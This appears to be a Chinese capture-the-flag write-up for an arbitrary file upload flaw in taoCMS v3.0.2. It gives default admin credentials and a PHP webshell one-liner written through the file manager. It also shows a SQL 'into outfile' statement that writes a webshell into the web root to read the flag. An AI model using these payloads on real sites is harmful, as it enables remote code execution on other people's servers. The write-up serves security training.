目录
一、题目

靶标介绍:
taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码
二、进入题目:

访问/admin
admin:tao

后台管理页面:
新建文件

2.1 文件写入一句话木马:
<?php system($_GET[1]);phpinfo();?>

访问 /shell.php?1=cat /flag

flag{567b48ba-ed69-4f38-a75f-1102ecd2c8e0}
<?php system('cat /flag');?>


flag{567b48ba-ed69-4f38-a75f-1102ecd2c8e0}
2.2 用SQL语句写入木马:

可以访问:

写入文件一句话木马:
select "<?php system('cat /flag');?>" into outfile '/var/www/html/cat.php'

访问/cat.php

flag{567b48ba-ed69-4f38-a75f-1102ecd2c8e0}
&spm=1001.2101.3001.5002&articleId=131881952&d=1&t=3&u=e20bb9fd32184ad981af1bd082428c01)
511

被折叠的 条评论
为什么被折叠?



